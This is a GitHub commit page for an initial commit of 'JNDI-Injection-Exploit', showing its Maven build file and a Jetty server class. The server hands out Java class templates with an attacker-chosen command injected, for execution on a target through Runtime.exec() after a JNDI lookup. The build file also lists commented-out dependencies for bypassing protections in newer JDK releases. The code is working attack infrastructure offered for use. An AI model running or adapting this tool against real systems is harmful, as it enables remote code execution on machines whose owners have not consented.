Skip to content

Commit a7a7d5e

Browse files
welk1nwelk1n
committed
Init
1 parent d5aa7a4 commit a7a7d5e

13 files changed

+1217
-0
lines changed

pom.xml

+136
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,136 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<modelVersion>4.0.0</modelVersion>
6+
7+
<groupId>welk1n</groupId>
8+
<artifactId>JNDI-Injection-Exploit</artifactId>
9+
<version>1.0-SNAPSHOT</version>
10+
11+
<properties>
12+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
13+
<jetty.version>8.1.9.v20130131</jetty.version>
14+
</properties>
15+
16+
17+
<dependencies>
18+
<!-- Util -->
19+
<dependency>
20+
<groupId>org.ow2.asm</groupId>
21+
<artifactId>asm</artifactId>
22+
<version>7.1</version>
23+
</dependency>
24+
25+
<dependency>
26+
<groupId>org.javassist</groupId>
27+
<artifactId>javassist</artifactId>
28+
<version>3.19.0-GA</version>
29+
</dependency>
30+
31+
<dependency>
32+
<groupId>org.reflections</groupId>
33+
<artifactId>reflections</artifactId>
34+
<version>0.9.9</version>
35+
</dependency>
36+
37+
<dependency>
38+
<groupId>org.slf4j</groupId>
39+
<artifactId>slf4j-nop</artifactId>
40+
<version>1.7.24</version>
41+
</dependency>
42+
43+
<dependency>
44+
<groupId>org.apache.commons</groupId>
45+
<artifactId>commons-lang3</artifactId>
46+
<version>3.4</version>
47+
</dependency>
48+
49+
<dependency>
50+
<groupId>commons-cli</groupId>
51+
<artifactId>commons-cli</artifactId>
52+
<version>1.3</version>
53+
</dependency>
54+
55+
56+
<!-- For LDAP reference jndi -->
57+
<dependency>
58+
<groupId>com.unboundid</groupId>
59+
<artifactId>unboundid-ldapsdk</artifactId>
60+
<version>3.1.1</version>
61+
</dependency>
62+
63+
<!-- Jetty -->
64+
<dependency>
65+
<groupId>org.eclipse.jetty.aggregate</groupId>
66+
<artifactId>jetty-webapp</artifactId>
67+
<version>${jetty.version}</version>
68+
</dependency>
69+
70+
<!-- Bypass JDK 1.8.0_191+ -->
71+
<!-- <dependency>-->
72+
<!-- <groupId>org.apache.tomcat</groupId>-->
73+
<!-- <artifactId>tomcat-catalina</artifactId>-->
74+
<!-- <version>8.5.38</version>-->
75+
<!-- </dependency>-->
76+
<!-- <dependency>-->
77+
<!-- <groupId>org.apache.tomcat</groupId>-->
78+
<!-- <artifactId>tomcat-jasper-el</artifactId>-->
79+
<!-- <version>8.5.38</version>-->
80+
<!-- </dependency>-->
81+
<!-- <dependency>-->
82+
<!-- <groupId>org.codehaus.groovy</groupId>-->
83+
<!-- <artifactId>groovy</artifactId>-->
84+
<!-- <version>2.4.5</version>-->
85+
<!-- </dependency>-->
86+
87+
<!-- test -->
88+
<dependency>
89+
<groupId>junit</groupId>
90+
<artifactId>junit</artifactId>
91+
<version>4.12</version>
92+
<scope>test</scope>
93+
</dependency>
94+
</dependencies>
95+
96+
97+
<build>
98+
<plugins>
99+
<plugin>
100+
<groupId>org.apache.maven.plugins</groupId>
101+
<artifactId>maven-compiler-plugin</artifactId>
102+
<configuration>
103+
<source>1.7</source>
104+
<target>1.7</target>
105+
</configuration>
106+
</plugin>
107+
108+
<plugin>
109+
<artifactId>maven-assembly-plugin</artifactId>
110+
<version>2.5.5</version>
111+
<configuration>
112+
<finalName>${project.artifactId}-${project.version}-all</finalName>
113+
<appendAssemblyId>false</appendAssemblyId>
114+
<descriptorRefs>
115+
<descriptorRef>jar-with-dependencies</descriptorRef>
116+
</descriptorRefs>
117+
<archive>
118+
<manifest>
119+
<mainClass>run.ServerStart</mainClass>
120+
</manifest>
121+
</archive>
122+
</configuration>
123+
<executions>
124+
<execution>
125+
<id>make-assembly</id>
126+
<phase>package</phase>
127+
<goals>
128+
<goal>single</goal>
129+
</goals>
130+
</execution>
131+
</executions>
132+
</plugin>
133+
</plugins>
134+
</build>
135+
136+
</project>

src/main/java/jetty/JettyServer.java

+113
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,113 @@
1+
package jetty;
2+
3+
import org.eclipse.jetty.server.Server;
4+
import org.eclipse.jetty.servlet.ServletHandler;
5+
import javax.servlet.ServletException;
6+
import javax.servlet.http.HttpServlet;
7+
import javax.servlet.http.HttpServletRequest;
8+
import javax.servlet.http.HttpServletResponse;
9+
import java.io.*;
10+
import java.net.URLEncoder;
11+
12+
import static run.ServerStart.getLocalTime;
13+
import static util.Transformers.insertCommand;
14+
15+
/**
16+
* @Classname JettyServer
17+
* @Description HTTPServer supply .class file which execute command by Runtime.getRuntime.exec()
18+
* @Author welkin
19+
*/
20+
public class JettyServer implements Runnable{
21+
private int port;
22+
private Server server;
23+
private static String command;
24+
25+
// public JettyServer(int port) {
26+
// this.port = port;
27+
// server = new Server(port);
28+
// command = "open /Applications/Calculator.app";
29+
// }
30+
31+
public JettyServer(int port,String cmd) {
32+
this.port = port;
33+
server = new Server(port);
34+
command = cmd;
35+
}
36+
37+
@Override
38+
public void run() {
39+
ServletHandler handler = new ServletHandler();
40+
server.setHandler(handler);
41+
42+
handler.addServletWithMapping(DownloadServlet.class, "/*");
43+
try {
44+
server.start();
45+
server.join();
46+
}catch (Exception e){
47+
e.printStackTrace();
48+
}
49+
50+
}
51+
52+
@SuppressWarnings("serial")
53+
public static class DownloadServlet extends HttpServlet {
54+
public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
55+
56+
String filename = request.getRequestURI().substring(1);
57+
InputStream in = checkFilename(filename);
58+
byte[] transformed;
59+
ByteArrayInputStream bain = null;
60+
61+
if (in != null) {
62+
try {
63+
transformed = insertCommand(in,command);
64+
bain = new ByteArrayInputStream(transformed);
65+
66+
}catch (Exception e){
67+
e.printStackTrace();
68+
System.out.println(getLocalTime() + " [JETTYSERVER]>> Byte array build failed.");
69+
}
70+
71+
System.out.println(getLocalTime() + " [JETTYSERVER]>> Log a request to " + request.getRequestURL());
72+
response.setStatus(HttpServletResponse.SC_OK);
73+
response.setHeader("content-disposition", "attachment;filename="+URLEncoder.encode(filename, "UTF-8"));
74+
75+
int len ;
76+
byte[] buffer = new byte[1024];
77+
OutputStream out = response.getOutputStream();
78+
if (bain != null){
79+
while ((len = bain.read(buffer)) > 0) {
80+
out.write(buffer,0,len);
81+
}
82+
bain.close();
83+
}else {
84+
System.out.println(getLocalTime() + " [JETTYSERVER]>> Read file error!");
85+
}
86+
}else {
87+
System.out.println(getLocalTime() + " [JETTYSERVER]>> URL("+ request.getRequestURL() +") Not Exist!");
88+
}
89+
}
90+
91+
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{
92+
doGet(request, response);
93+
}
94+
}
95+
96+
private static InputStream checkFilename(String filename){
97+
String template;
98+
switch (filename){
99+
case "ExecTemplateJDK7.class":
100+
template = "template/ExecTemplateJDK7.class";
101+
break;
102+
case "ExecTemplateJDK8.class":
103+
template = "template/ExecTemplateJDK8.class";
104+
break;
105+
// TODO:Add more
106+
default:
107+
return null;
108+
}
109+
return Thread.currentThread().getContextClassLoader().getResourceAsStream(template);
110+
111+
}
112+
113+
}

0 commit comments

Comments
 (0)